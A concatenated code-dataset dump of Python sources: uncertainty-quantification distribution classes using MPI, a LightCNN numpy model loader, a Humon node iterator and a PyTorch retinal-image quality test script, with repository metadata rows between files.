                'distribution outside expected [-1, 1] bounds'
            )
            return -1
    def generate_samples(self, samp_size):
        """
        Inputs: samp_size- the number of points needed to be generated

        Overrides the Variable class generate_samples to align with
        a uniform distribution.
        """
        vals = (
            uniform_hypercube(self.interval_low, self.interval_high, samp_size)
        )
        return vals
    def get_norm_sq_val(self, matrix_val):
        """
        Inputs: matrix_val- the value in the model matrix to consider

        Overrides the Variable class get_norm_sq_val to align with
        a uniform distribution: the Legendre norm squared against the
        uniform pdf on [-1, 1] is 1 / (2n + 1).
        """
        return 1.0 / (2.0 * matrix_val + 1.0)
    def get_resamp_vals(self, samp_size):
        """
        Inputs: samp_size- the number of samples to generate according to the
                distribution

        Overrides the Variable class get_resamp_vals to align with
        a uniform distribution. Each MPI rank draws its share and the full
        vector is assembled on every rank via Allgatherv.
        """
        comm = MPI_COMM_WORLD
        size = comm.size
        rank = comm.rank
        # Split samp_size across ranks; the first `rem` ranks take one extra.
        base = samp_size // size
        rem = samp_size % size
        count = base + (rank < rem)
        ranks = np.arange(0, size, dtype=int)
        seq_count = (ranks < rem) + base
        seq_disp = base * ranks + (ranks >= rem) * rem + (ranks < rem) * ranks
        self.resample = np.zeros(samp_size)
        resample = np.random.uniform(-1, 1, count)
        comm.Allgatherv(
            [resample, count, MPI_DOUBLE],
            [self.resample, seq_count, seq_disp, MPI_DOUBLE]
        )
        # The bound is included to help with ProbabilityBox convergence.
        self.resample[0] = -1
        self.resample[1] = 1
        return self.resample
    def check_num_string(self):
        """
        Searches to replace string 'pi' with its numpy equivalent in any of
        the values that might contain it.
        """
        if isinstance(self.interval_low, str) and 'pi' in self.interval_low:
            self.interval_low = float(self.interval_low.replace('pi', str(np.pi)))
        if isinstance(self.interval_high, str) and 'pi' in self.interval_high:
            self.interval_high = float(self.interval_high.replace('pi', str(np.pi)))
    def get_mean(self):
        """
        Return the mean of the variable (the interval midpoint).
        """
        return (self.interval_high - self.interval_low) / 2 + self.interval_low
class NormalVariable(ContinuousVariable):
"""
Inputs: mean- the mean of the variable
stdev- the standard deviation of the variable
order- the order of the model to calculate the orthogonal
polynomials and norm squared values
type- the type of variable
name- the name of the variable
number- the number of the variable from the file
Represents a normal variable. The methods in this class correspond to
those of a normal variable.
"""
__slots__ = ('mean', 'stdev')
def __init__(self, mean, stdev, order=2, type='aleatory',
name='', number=0
):
if not stdev > 0:
raise VariableInputError(
'NormalVariable stdev must be greater than 0.'
)
self.mean = mean
self.stdev = stdev
self.order = order
self.type = UncertaintyType.from_name(type)
self.name = f'x{number}' if name == '' else name
self.var_str = f'x{number}'
self.x = symbols(self.var_str)
self.distribution = Distribution.NORMAL
self.generate_orthopoly()
low_percent = 8e-17
high_percent = 1 - low_percent
dist = norm(loc=self.mean, scale=self.stdev)
self.low_approx = dist.ppf(low_percent)
self.high_approx = dist.ppf(high_percent)
self.std_bounds = (
self.standardize_points(self.low_approx),
self.standardize_points(self.high_approx)
)
self.bounds = (dist.ppf(low_percent), dist.ppf(high_percent))
self.check_num_string()
if self.type == UncertaintyType.EPISTEMIC:
warn(
'The NormalVariable is usually not epistemic. For an epistemic '
'variable, consider using the uniform distribution with type '
'epistemic.'
)
showwarning = _warn
def generate_orthopoly(self):
"""
Generates the orthogonal polynomials for a normal variable up to the
order of polynomial expansion.
"""
self.var_orthopoly_vect = zeros(self.order + 1, 1)
x = self.x
for n in range(self.order + 1):
if n == 0:
self.var_orthopoly_vect[n] = 1
elif n == 1:
self.var_orthopoly_vect[n] = 2 * x
else:
self.var_orthopoly_vect[n] = (
2 * x * self.var_orthopoly_vect[n - 1] - 2 * (n - 1)
* self.var_orthopoly_vect[n - 2]
)
for n in range(self.order + 1): # transform into probabalists Hermite poly
self.var_orthopoly_vect[n] = (
2 ** (-n / 2)
* self.var_orthopoly_vect[n].subs({x:x / math.sqrt(2)})
)
self.var_orthopoly_vect = np.array(self.var_orthopoly_vect).astype(object).T[0]
def standardize(self, orig, std_vals):
"""
Inputs: orig- the un-standardized values
std_vals- the attribue name for the standardized vals
Overrides the Variable class standardize to align with
a normal distribution.
"""
original = getattr(self, orig)
standard = (original[:] - self.mean) / (self.stdev)
setattr(self, std_vals, standard)
return getattr(self, std_vals)
def standardize_points(self, values):
"""
Inputs: values- unstandardized points corresponding to the variable's
distribution
Standardizes and returns the inputs points.
"""
return (values - self.mean) / (self.stdev)
def unstandardize_points(self, value):
"""
Inputs: value- the standardized value to be unstandardized
Calculates and returns the unscaled variable value from the
standardized value.
"""
return (value * self.stdev) + self.mean
def check_distribution(self):
"""
Overrides the Variable class check_distribution to align with
a normal distribution.
"""
comm = MPI_COMM_WORLD
rank = comm.rank
if rank == 0 and (np.max(self.std_vals) > 4.5) or (np.min(self.std_vals) < -4.5):
warn(
f'Large standardized value for variable {self.name} '
'with normal distribution found. Check input and run matrix.'
)
return -1
def generate_samples(self, samp_size):
"""
Inputs: samp_size- the number of points needed to be generated
Overrides the Variable class generate_samples to align with
a normal distribution.
"""
low_percent = 8e-17
high_percent = 1 - low_percent
dist = norm(loc=self.mean, scale=self.stdev)
rnd_hypercube = uniform_hypercube(low_percent, high_percent, samp_size)
vals = dist.ppf(rnd_hypercube)
return vals
def get_norm_sq_val(self, matrix_value):
"""
Inputs: matrix_val- the value in the model matrix to consider
Overrides the Variable class get_norm_sq_val to align with
a normal distribution.
"""
return math.factorial(matrix_value)
    def get_resamp_vals(self, samp_size):
        """
        Inputs: samp_size- the number of samples to generate according to the
                distribution

        Overrides the Variable class get_resamp_vals to align with
        a normal distribution. Each MPI rank draws its share of
        standard-normal samples and the results are gathered onto every
        rank via Allgatherv.
        """
        comm = MPI_COMM_WORLD
        size = comm.size
        rank = comm.rank
        # Split samp_size across ranks; the first `rem` ranks take one extra.
        base = samp_size // size
        rem = samp_size % size
        count = base + (rank < rem)
        ranks = np.arange(0, size, dtype=int)
        # Per-rank receive counts and displacements for the Allgatherv below.
        seq_count = (ranks < rem) + base
        seq_disp = base * ranks + (ranks >= rem) * rem + (ranks < rem) * ranks
        self.resample = np.zeros(samp_size)
        # Local draw of this rank's portion of the standard-normal samples.
        resample = np.random.randn(count)
        comm.Allgatherv(
            [resample, count, MPI_DOUBLE],
            [self.resample, seq_count, seq_disp, MPI_DOUBLE]
        )
        return self.resample
def check_num_string(self):
"""
Searches to replace sring 'pi' with its numpy equivalent in any of the
values that might contain it.
"""
if isinstance(self.mean, str) and 'pi' in self.mean:
self.mean = float(self.mean.replace('pi', str(np.pi)))
if isinstance(self.stdev, str) and 'pi' in self.stdev:
self.stdev = float(self.stdev.replace('pi', str(np.pi)))
    def get_mean(self):
        """
        Return the mean of the variable (the normal distribution's
        location parameter).
        """
        return self.mean
class BetaVariable(ContinuousVariable):
    """
    Inputs: alpha- the alpha parameter of the variable
            beta- the beta parameter of the variable
            interval_low- the low interval of the variable
            interval_high- the high interval of the variable
            order- the order of the model to calculate the orthogonal
            polynomials and norm squared values
            type- the type of variable
            name- the name of the variable
            number- the number of the variable from the file

    Represents a beta variable. The methods in this class correspond to
    those of a beta variable.
    """
    __slots__ = ('alpha', 'beta')

    # Standardized beta pdf on [0, 1]; A and B are substituted with the
    # alpha and beta parameters when the expression is parsed.
    equation = '((A+B-1)! * (x)**(A-1) * (1-x)**(B-1)) / ((A-1)! * (B-1)!)'

    def __init__(self, alpha, beta, interval_low=0.0, interval_high=1.0, order=2,
            type='aleatory', name='', number=0
        ):
        # The interval endpoints must be supplied together; each argument is
        # compared against its default object to detect a half-specified pair.
        if not (
            (interval_low is self.__init__.__defaults__[0])
            == (interval_high is self.__init__.__defaults__[1])
        ):
            raise VariableInputError(
                'For BetaVariable, if interval_low or interval_high is '
                'provided, both must be provided.'
            )

        if not ((alpha > 0) and (beta > 0)):
            raise VariableInputError(
                'BetaVariable alpha and beta must be greater than 0.'
            )

        self.alpha = alpha
        self.beta = beta
        self.interval_low = interval_low
        self.interval_high = interval_high
        self.order = order
        self.type = UncertaintyType.from_name(type)
        self.name = f'x{number}' if name == '' else name
        self.var_str = f'x{number}'
        self.x = symbols(self.var_str)
        self.distribution = Distribution.BETA

        # The standardized beta distribution lives on [0, 1].
        low = 0
        high = 1
        # NOTE(review): std_bounds is set to the unstandardized interval here;
        # (low, high) would be the standardized support -- confirm intent.
        self.std_bounds = (self.interval_low, self.interval_high)

        parsed_dist = parse_expr(
            self.equation,
            local_dict={
                'A':parse_expr(str(Fraction(self.alpha))),
                'B':parse_expr(str(Fraction(self.beta))),
                'x':self.x
            }
        )

        self.generate_orthopoly()
        self.create_norm_sq(low, high, parsed_dist)

        self.low_approx = self.interval_low
        self.high_approx = self.interval_high
        self.bounds = (self.interval_low, self.interval_high)

        self.check_num_string()

        if self.type == UncertaintyType.EPISTEMIC:
            warn(
                'The BetaVariable is usually not epistemic. For an epistemic '
                'variable, consider using the uniform distribution with type '
                'epistemic.'
            )
        showwarning = _warn

    def generate_orthopoly(self):
        """
        Generates the orthogonal polynomials for a beta variable up to the
        self.order of polynomial expansion.
        """
        var_orthopoly_vect = np.zeros(self.order + 1, dtype=object)
        self.var_orthopoly_vect = np.zeros(self.order + 1, dtype=object)
        x = self.x
        a = parse_expr(str(Fraction(self.alpha)))
        b = parse_expr(str(Fraction(self.beta)))
        decimals = 30  # precision kept when numerically evaluating each term

        for n in range(self.order + 1):
            if n == 0:
                var_orthopoly_vect[n] = 1
                self.var_orthopoly_vect[n] = 1
            elif n == 1:
                var_orthopoly_vect[n] = x - (a / (a + b))
                self.var_orthopoly_vect[n] = x - (a / (a + b))
            else:
                # Recurrence: subtract from x**n its projection onto every
                # lower-order polynomial (Jacobi-polynomial construction).
                var_orthopoly_vect[n] = x ** n
                pasc = pascal(self.order + 1, kind='lower')
                for m in range(n):
                    var_orthopoly_vect[n] -= parse_expr(
                        f'{pasc[n, m]} * ((a+n-1)!*(a+b+2*m-1)!)/((a+m-1)!*(a+b+n+m-1)!)*({var_orthopoly_vect[m]})',
                        local_dict={'a':a, 'b':b, 'n':n, 'm':m, 'x':x}
                    )
                self.var_orthopoly_vect[n] = N(var_orthopoly_vect[n], decimals)

        return self.var_orthopoly_vect

    def standardize(self, orig, std_vals):
        """
        Inputs: orig- the un-standardized values
                std_vals- the attribute name for the standardized vals

        Overrides the Variable class standardize to align with
        a beta distribution: maps [interval_low, interval_high] onto [0, 1].
        """
        original = getattr(self, orig)
        standard = (
            (original[:] - self.interval_low)
            / (self.interval_high - self.interval_low)
        )
        setattr(self, std_vals, standard)
        return getattr(self, std_vals)

    def standardize_points(self, values):
        """
        Inputs: values- unstandardized points corresponding to the variable's
                distribution

        Standardizes and returns the input points onto [0, 1].
        """
        standard = (
            (values - self.interval_low)
            / (self.interval_high - self.interval_low)
        )
        return standard

    def unstandardize_points(self, value):
        """
        Inputs: value- the standardized value to be unstandardized

        Calculates and returns the unscaled variable value from the
        standardized value.
        """
        # Cleaned up: the original chained assignment (`unscaled_value =
        # value = ...`) needlessly rebound the parameter as well.
        unscaled_value = (
            value * (self.interval_high - self.interval_low)
            + self.interval_low
        )
        return unscaled_value

    def check_distribution(self):
        """
        Overrides the Variable class check_distribution to align with
        a beta distribution. Warns (root rank only) on standardized values
        outside +/- `shift`, then returns -1 like the sibling classes.
        """
        shift = 8
        comm = MPI_COMM_WORLD
        rank = comm.rank
        # Bug fix: the original `rank == 0 and A or B` let every rank warn
        # whenever the minimum check fired (`and` binds tighter than `or`).
        # Grouping matches the exponential/gamma implementations.
        if rank == 0 and ((np.max(self.std_vals) > shift)
            or (np.min(self.std_vals) < -shift)
        ):
            warn(
                f'Large standardized value for variable {self.name} '
                'with Beta distribution found. Check input and run matrix.'
            )
        return -1

    def generate_samples(self, samp_size):
        """
        Inputs: samp_size- the number of points needed to be generated

        Overrides the Variable class generate_samples to align with
        a beta distribution. The full [0, 1] probability range is kept so
        the interval endpoints can be realized.
        """
        low_percent = 0
        high_percent = 1
        dist = beta(a=self.alpha, b=self.beta)
        rnd_hypercube = uniform_hypercube(low_percent, high_percent, samp_size)
        vals = (
            (dist.ppf(rnd_hypercube) * (self.interval_high - self.interval_low))
            + self.interval_low
        )
        return vals

    def get_resamp_vals(self, samp_size):
        """
        Inputs: samp_size- the number of samples to generate according to the
                distribution

        Overrides the Variable class get_resamp_vals to align with
        a beta distribution. Each MPI rank draws its share locally and the
        results are gathered onto every rank via Allgatherv.
        """
        comm = MPI_COMM_WORLD
        size = comm.size
        rank = comm.rank
        # Split samp_size across ranks; the first `rem` ranks take one extra.
        base = samp_size // size
        rem = samp_size % size
        count = base + (rank < rem)
        ranks = np.arange(0, size, dtype=int)
        seq_count = (ranks < rem) + base
        seq_disp = base * ranks + (ranks >= rem) * rem + (ranks < rem) * ranks
        self.resample = np.zeros(samp_size)
        resample = np.random.beta(a=self.alpha, b=self.beta, size=count)
        comm.Allgatherv(
            [resample, count, MPI_DOUBLE],
            [self.resample, seq_count, seq_disp, MPI_DOUBLE]
        )
        # The bound is included to help with ProbabilityBox convergence.
        self.resample[0] = 0
        self.resample[1] = 1
        return self.resample

    def check_num_string(self):
        """
        Searches to replace string 'pi' with its numpy equivalent in any of
        the values that might contain it.
        """
        if isinstance(self.alpha, str) and 'pi' in self.alpha:
            self.alpha = float(self.alpha.replace('pi', str(np.pi)))
        if isinstance(self.beta, str) and 'pi' in self.beta:
            self.beta = float(self.beta.replace('pi', str(np.pi)))
        if isinstance(self.interval_low, str) and 'pi' in self.interval_low:
            self.interval_low = float(self.interval_low.replace('pi', str(np.pi)))
        if isinstance(self.interval_high, str) and 'pi' in self.interval_high:
            self.interval_high = float(self.interval_high.replace('pi', str(np.pi)))

    def get_mean(self):
        """
        Return the mean of the variable: the standard beta mean
        alpha / (alpha + beta), rescaled onto the interval.
        """
        scale = self.interval_high - self.interval_low
        mean = (
            self.interval_low + scale * (self.alpha / (self.alpha + self.beta))
        )
        return mean
class ExponentialVariable(ContinuousVariable):
    """
    Inputs: lambd- the lambda parameter of the variable values
            interval_low- the low interval of the variable
            order- the order of the model to calculate the orthogonal
            polynomials and norm squared values
            type- the type of variable
            name- the name of the variable
            number- the number of the variable from the file

    Represents an exponential variable. The methods in this class correspond to
    those of an exponential variable.
    """
    # Tuple form (the original string form behaves identically for a single
    # slot but reads as a mistake). 'lambda' is a Python keyword, so the
    # attribute is always accessed via getattr/setattr.
    __slots__ = ('lambda',)

    equation = 'lambd * exp(-lambd * x)'

    def __init__(
            self, lambd, interval_low=0, order=2, type='aleatory',
            name='', number=0
        ):
        if lambd <= 0:
            raise VariableInputError(
                'ExponentialVariable lambd must be greater than 0.'
            )

        setattr(self, 'lambda', lambd)
        self.interval_low = interval_low
        self.order = order
        self.type = UncertaintyType.from_name(type)
        self.name = f'x{number}' if name == '' else name
        self.var_str = f'x{number}'
        self.x = symbols(self.var_str)
        self.distribution = Distribution.EXPONENTIAL

        # Standardized support is [0, inf).
        low = 0
        high = 'oo'

        parsed_dist = parse_expr(
            self.equation,
            local_dict={
                'lambd':parse_expr(str(Fraction(getattr(self, 'lambda')))),
                'x':self.x
            }
        )

        # if inf bounds, find approximate bound
        low_percent = 8e-17
        high_percent = 1 - low_percent
        # Bug fix: the original passed lambda positionally, which scipy
        # interprets as the *loc* (shift) parameter. The rate enters scipy's
        # expon through scale = 1 / lambda, exactly as generate_samples does.
        dist = expon(scale=1 / getattr(self, 'lambda'))
        self.low_approx = self.interval_low
        self.high_approx = dist.ppf(high_percent)
        self.bounds = (self.interval_low, self.high_approx)
        self.std_bounds = (low, self.standardize_points(self.high_approx))

        self.recursive_var_basis(parsed_dist, low, high, self.order)
        self.create_norm_sq(low, high, parsed_dist)

        self.check_num_string()

        if self.type == UncertaintyType.EPISTEMIC:
            warn(
                'The ExponentialVariable is usually not epistemic. For an epistemic '
                'variable, consider using the uniform distribution with type '
                'epistemic.'
            )
        showwarning = _warn

    def standardize(self, orig, std_vals):
        """
        Inputs: orig- the un-standardized values
                std_vals- the attribute name for the standardized vals

        Overrides the Variable class standardize to align with an
        exponential distribution (a pure shift by interval_low).
        """
        original = getattr(self, orig)
        standard = (original[:] - self.interval_low)
        setattr(self, std_vals, standard)
        return getattr(self, std_vals)

    def standardize_points(self, values):
        """
        Inputs: values- unstandardized points corresponding to the variable's
                distribution

        Standardizes and returns the input points.
        """
        return values - self.interval_low

    def unstandardize_points(self, value):
        """
        Inputs: value- the standardized value to be unstandardized

        Calculates and returns the unscaled variable value from the
        standardized value.
        """
        return value + self.interval_low

    def check_distribution(self):
        """
        Overrides the Variable class check_distribution to align with
        an exponential distribution. Warns (root rank only) on standardized
        values below 0 or above `shift`, then returns -1.
        """
        shift = 15
        comm = MPI_COMM_WORLD
        rank = comm.rank
        if rank == 0 and ((np.min(self.std_vals) < 0)
            or (np.max(self.std_vals) > shift)
        ):
            warn(
                f'Large standardized value for variable {self.name} '
                'with exponential distribution found. Check input and run '
                'matrix.'
            )
        return -1

    def generate_samples(self, samp_size):
        """
        Inputs: samp_size- the number of samples to generate according to the
                distribution

        Overrides the Variable class generate_samples to align with
        an exponential distribution.
        """
        percent_shift = 8e-17
        low_percent = 0
        high_percent = 1 - percent_shift
        dist = expon(scale=1 / getattr(self, 'lambda'))
        rnd_hypercube = uniform_hypercube(low_percent, high_percent, samp_size)
        vals = dist.ppf(rnd_hypercube) + self.interval_low
        np.random.shuffle(vals)
        return vals

    def get_resamp_vals(self, samp_size):
        """
        Inputs: samp_size- the number of samples to generate according to the
                distribution

        Overrides the Variable class get_resamp_vals to align with
        an exponential distribution. Each MPI rank draws locally and the
        results are gathered onto every rank via Allgatherv.
        """
        comm = MPI_COMM_WORLD
        size = comm.size
        rank = comm.rank
        # Split samp_size across ranks; the first `rem` ranks take one extra.
        base = samp_size // size
        rem = samp_size % size
        count = base + (rank < rem)
        ranks = np.arange(0, size, dtype=int)
        seq_count = (ranks < rem) + base
        seq_disp = base * ranks + (ranks >= rem) * rem + (ranks < rem) * ranks
        self.resample = np.zeros(samp_size)
        resample = np.random.exponential(
            scale=(1 / getattr(self, 'lambda')), size=count
        )
        comm.Allgatherv(
            [resample, count, MPI_DOUBLE],
            [self.resample, seq_count, seq_disp, MPI_DOUBLE]
        )
        # The bound is included to help with ProbabilityBox convergence.
        self.resample[0] = 0
        return self.resample

    def check_num_string(self):
        """
        Searches to replace string 'pi' with its numpy equivalent in any of
        the values that might contain it.
        """
        lambd = getattr(self, 'lambda')
        if isinstance(lambd, str) and 'pi' in lambd:
            setattr(self, 'lambda', float(lambd.replace('pi', str(np.pi))))

    def get_mean(self):
        """
        Return the mean of the variable: interval_low + 1 / lambda.
        """
        return self.interval_low + (1 / getattr(self, 'lambda'))
class GammaVariable(ContinuousVariable):
    """
    Inputs: alpha- the alpha parameter of the variable
            theta- the theta parameter of the variable
            interval_low- the low interval of the variable
            order- the order of the model to calculate the orthogonal
            polynomials and norm squared values
            type- the type of variable
            name- the name of the variable
            number- the number of the variable from the file

    Represents a gamma variable. The methods in this class correspond to
    those of a gamma variable.
    """
    __slots__ = ('alpha', 'theta')

    # This is the standardized form required for the UQPCE variable basis and
    # norm squared.
    equation = '(x**(A-1) * exp(-x)) / (A-1)!'

    def __init__(
            self, alpha, theta, interval_low=0, order=2, type='aleatory',
            name='', number=0
        ):
        if not ((alpha > 0) and (theta > 0)):
            raise VariableInputError(
                'GammaVariable alpha and theta must be greater than 0.'
            )

        self.alpha = alpha
        self.theta = theta
        self.interval_low = interval_low
        self.order = order
        self.type = UncertaintyType.from_name(type)
        self.name = f'x{number}' if name == '' else name
        self.var_str = f'x{number}'
        self.x = symbols(self.var_str)
        self.distribution = Distribution.GAMMA

        # Standardized support is [0, inf).
        low = 0
        high = 'oo'

        self.check_num_string()

        if self.type == UncertaintyType.EPISTEMIC:
            # Bug fix: this message previously named 'ExponentialVariable'
            # (copy-paste from the class above).
            warn(
                'The GammaVariable is usually not epistemic. For an epistemic '
                'variable, consider using the uniform distribution with type '
                'epistemic.'
            )
        showwarning = _warn

        x = symbols(self.var_str)
        parsed_dist = parse_expr(
            self.equation,
            local_dict={'A':parse_expr(str(Fraction(self.alpha))), 'x':x}
        )

        self.recursive_var_basis(parsed_dist, low, high, self.order)
        # NOTE(review): create_norm_sq appears to populate norm_sq_vals;
        # this pre-allocation may be redundant -- kept for safety.
        self.norm_sq_vals = np.zeros(len(self.var_orthopoly_vect))
        self.create_norm_sq(low, high, parsed_dist)

        # if inf bounds, find approximate bound
        low_percent = 8e-17
        high_percent = 1 - low_percent
        dist = gamma(self.alpha, scale=self.theta)
        self.low_approx = self.interval_low
        self.high_approx = dist.ppf(high_percent)
        upper = dist.ppf(high_percent)
        self.bounds = (self.interval_low, upper)
        self.std_bounds = (low, self.standardize_points(upper))

    def standardize(self, orig, std_vals):
        """
        Inputs: orig- the un-standardized values
                std_vals- the attribute name for the standardized vals

        Overrides the Variable class standardize to align with
        a gamma distribution: shift by interval_low, scale by theta.
        """
        standard = (getattr(self, orig) - self.interval_low) / self.theta
        setattr(self, std_vals, standard)
        return getattr(self, std_vals)

    def standardize_points(self, values):
        """
        Inputs: values- unstandardized points corresponding to the variable's
                distribution

        Standardizes and returns the input points.
        """
        return (values - self.interval_low) / self.theta

    def unstandardize_points(self, value):
        """
        Inputs: value- the standardized value to be unstandardized

        Calculates and returns the unscaled variable value from the
        standardized value.
        """
        return (value * self.theta) + self.interval_low

    def check_distribution(self):
        """
        Overrides the Variable class check_distribution to align with
        a gamma distribution. Warns (root rank only) on standardized values
        above `shift` or below 0, then returns -1.
        """
        shift = 15
        comm = MPI_COMM_WORLD
        rank = comm.rank
        if rank == 0 and ((np.max(self.std_vals) > shift)
            or (np.min(self.std_vals) < 0)
        ):
            warn(
                f'Large standardized value for variable {self.name} '
                'with gamma distribution found. Check input and run matrix.'
            )
        return -1

    def generate_samples(self, samp_size):
        """
        Inputs: samp_size- the number of points needed to be generated

        Overrides the Variable class generate_samples to align with
        a gamma distribution.
        """
        percent_shift = 8e-17
        low_percent = 0
        high_percent = 1 - percent_shift
        dist = gamma(self.alpha, scale=self.theta)
        rnd_hypercube = uniform_hypercube(low_percent, high_percent, samp_size)
        vals = dist.ppf(rnd_hypercube) + self.interval_low
        return vals

    def get_resamp_vals(self, samp_size):
        """
        Inputs: samp_size- the number of samples to generate according to the
                distribution

        Overrides the Variable class get_resamp_vals to align with
        a gamma distribution. Each MPI rank draws locally (standardized,
        scale=1) and the results are gathered via Allgatherv.
        """
        comm = MPI_COMM_WORLD
        size = comm.size
        rank = comm.rank
        # Split samp_size across ranks; the first `rem` ranks take one extra.
        base = samp_size // size
        rem = samp_size % size
        count = base + (rank < rem)
        ranks = np.arange(0, size, dtype=int)
        seq_count = (ranks < rem) + base
        seq_disp = base * ranks + (ranks >= rem) * rem + (ranks < rem) * ranks
        self.resample = np.zeros(samp_size)
        resample = np.random.gamma(shape=self.alpha, scale=1, size=count)
        comm.Allgatherv(
            [resample, count, MPI_DOUBLE],
            [self.resample, seq_count, seq_disp, MPI_DOUBLE]
        )
        # The bound is included to help with ProbabilityBox convergence.
        self.resample[0] = 0
        return self.resample

    def check_num_string(self):
        """
        Searches to replace string 'pi' with its numpy equivalent in any of
        the values that might contain it.
        """
        if isinstance(self.alpha, str) and 'pi' in self.alpha:
            self.alpha = float(self.alpha.replace('pi', str(np.pi)))
        if isinstance(self.theta, str) and 'pi' in self.theta:
            self.theta = float(self.theta.replace('pi', str(np.pi)))

    def get_mean(self):
        """
        Return the mean of the variable: interval_low + alpha * theta.
        """
        return self.interval_low + (self.alpha * self.theta)
| 9,264 | 0 | 162 |
3b43290f57f5361d72dccd25ab08a3672574209a | 518 | py | Python | knn/test_light_cnn_in_numpy.py | Starman-SWA/Face-recognition-trolley-based-on-AX7010-FPGA-board | d518158c20da4b3f2536867cfda30848911d08c7 | [
"MIT"
] | 1 | 2021-02-05T03:17:43.000Z | 2021-02-05T03:17:43.000Z | knn/test_light_cnn_in_numpy.py | Starman-SWA/Face-recognition-trolley-based-on-AX7010-FPGA-board | d518158c20da4b3f2536867cfda30848911d08c7 | [
"MIT"
] | null | null | null | knn/test_light_cnn_in_numpy.py | Starman-SWA/Face-recognition-trolley-based-on-AX7010-FPGA-board | d518158c20da4b3f2536867cfda30848911d08c7 | [
"MIT"
] | 2 | 2020-10-20T12:36:35.000Z | 2021-02-05T03:37:30.000Z | import os
import numpy as np
import cv2
from module.lightCNN_model_in_numpy import LightCNN9_in_numpy
def get_net(path):
    '''
    Build the LightCNN-9 numpy network from a saved configuration file.

    :param path: path to the .npy file holding the pickled layer config
    :return: a LightCNN9_in_numpy instance
    '''
    print('Loading network...')
    loaded = np.load(path, allow_pickle=True).item()
    return LightCNN9_in_numpy(loaded)
if __name__ == '__main__':
get_net() | 20.72 | 61 | 0.65444 | import os
import numpy as np
import cv2
from module.lightCNN_model_in_numpy import LightCNN9_in_numpy
def get_net(path):
    '''
    Load the serialized layer configuration and wrap it in a
    LightCNN9_in_numpy model.

    :param path: location of the pickled numpy configuration file
    :return: the constructed network
    '''
    print('Loading network...')
    raw = np.load(path, allow_pickle=True)
    cfg_dict = raw.item()
    model = LightCNN9_in_numpy(cfg_dict)
    return model
def get_feature(net, data, length2=0):
    '''
    Run *data* through *net* and add a leading batch axis to the 2-D output.

    :param net: a callable network returning a 2-D array
    :param data: the input passed to the network
    :param length2: accepted for interface compatibility; unused
    :return: the network output reshaped to (1, rows, cols)
    '''
    out = net(data)
    return out.reshape(-1, out.shape[0], out.shape[1])
if __name__ == '__main__':
get_net() | 111 | 0 | 23 |
74e42152f180c52cf37b991dd6644029a8a92167 | 414 | py | Python | humon/iterators.py | spacemeat/humon-py | f67119be656c169fda5624ef1d33d639e0e84809 | [
"MIT"
] | null | null | null | humon/iterators.py | spacemeat/humon-py | f67119be656c169fda5624ef1d33d639e0e84809 | [
"MIT"
] | null | null | null | humon/iterators.py | spacemeat/humon-py | f67119be656c169fda5624ef1d33d639e0e84809 | [
"MIT"
] | null | null | null | class ChildNodeIterator:
'''Iterates over a Humon node's children.'''
def __next__(self):
'''Iterate.'''
if self.idx < self.node.numChildren:
res = self.node.getChild(self.idx)
self.idx += 1
return res
raise StopIteration
| 21.789474 | 48 | 0.550725 | class ChildNodeIterator:
'''Iterates over a Humon node's children.'''
def __init__(self, node):
self.node = node
self.idx = 0
    def __iter__(self):
        '''Iterator protocol: this object is its own iterator.'''
        return self
def __next__(self):
'''Iterate.'''
if self.idx < self.node.numChildren:
res = self.node.getChild(self.idx)
self.idx += 1
return res
raise StopIteration
| 68 | 0 | 53 |
f0b51b9f7d466f08118ff51d5a5c47810f375d48 | 13,354 | py | Python | M1_Retinal_Image_quality_EyePACS/test_outside.py | rmaphoh/AutoMorph | 0c82ce322c6cd8bd80f06bbd85c5c2542e534cb8 | [
"Apache-2.0"
] | 1 | 2022-01-28T00:56:23.000Z | 2022-01-28T00:56:23.000Z | M1_Retinal_Image_quality_EyePACS/test_outside.py | rmaphoh/AutoMorph | 0c82ce322c6cd8bd80f06bbd85c5c2542e534cb8 | [
"Apache-2.0"
] | null | null | null | M1_Retinal_Image_quality_EyePACS/test_outside.py | rmaphoh/AutoMorph | 0c82ce322c6cd8bd80f06bbd85c5c2542e534cb8 | [
"Apache-2.0"
] | null | null | null |
'''
Code of testing
'''
import argparse
import logging
import os
import sys
import csv
import time
import torch
import numpy as np
import pandas as pd
import torch.nn as nn
from tqdm import tqdm
from pycm import *
import matplotlib
import matplotlib.pyplot as plt
from dataset import BasicDataset_OUT
from torch.utils.data import DataLoader
from model import Resnet101_fl, InceptionV3_fl, Densenet161_fl, Resnext101_32x8d_fl, MobilenetV2_fl, Vgg16_bn_fl, Efficientnet_fl
#torch.distributed.init_process_group(backend="nccl")
# Global Matplotlib font configuration used by any plots this script makes.
font = {
        'weight' : 'normal',
        'size'   : 18}
plt.rc('font',family='Times New Roman')
matplotlib.rc('font', **font)
if __name__ == '__main__':
    logging.basicConfig(level=logging.INFO, format='%(levelname)s: %(message)s')
    args = get_args()
    # Pin this process to the GPU selected by --local_rank.
    torch.cuda.set_device(args.local_rank)
    device = torch.device("cuda", args.local_rank)
    #logging.info(f'Using device {device}')
    test_dir = args.test_dir
    dataset=args.dataset
    img_size= (512,512)
    # Instantiate the requested backbone. Only 'resnext101' and
    # 'efficientnet' build the 8-member ensemble used below; the other
    # branches build a single model_fl that the rest of this script
    # does not load or evaluate.
    if args.model=='inceptionv3':
        model_fl = InceptionV3_fl(pretrained=True)
    if args.model=='densenet161':
        model_fl = Densenet161_fl(pretrained=True)
    if args.model == 'resnet101':
        model_fl = Resnet101_fl(pretrained=True)
    if args.model == 'resnext101':
        model_fl_1 = Resnext101_32x8d_fl(pretrained=True)
        model_fl_2 = Resnext101_32x8d_fl(pretrained=True)
        model_fl_3 = Resnext101_32x8d_fl(pretrained=True)
        model_fl_4 = Resnext101_32x8d_fl(pretrained=True)
        model_fl_5 = Resnext101_32x8d_fl(pretrained=True)
        model_fl_6 = Resnext101_32x8d_fl(pretrained=True)
        model_fl_7 = Resnext101_32x8d_fl(pretrained=True)
        model_fl_8 = Resnext101_32x8d_fl(pretrained=True)
    if args.model == 'efficientnet':
        model_fl_1 = Efficientnet_fl(pretrained=True)
        model_fl_2 = Efficientnet_fl(pretrained=True)
        model_fl_3 = Efficientnet_fl(pretrained=True)
        model_fl_4 = Efficientnet_fl(pretrained=True)
        model_fl_5 = Efficientnet_fl(pretrained=True)
        model_fl_6 = Efficientnet_fl(pretrained=True)
        model_fl_7 = Efficientnet_fl(pretrained=True)
        model_fl_8 = Efficientnet_fl(pretrained=True)
    if args.model == 'mobilenetv2':
        model_fl = MobilenetV2_fl(pretrained=True)
    if args.model == 'vgg16bn':
        model_fl = Vgg16_bn_fl(pretrained=True)
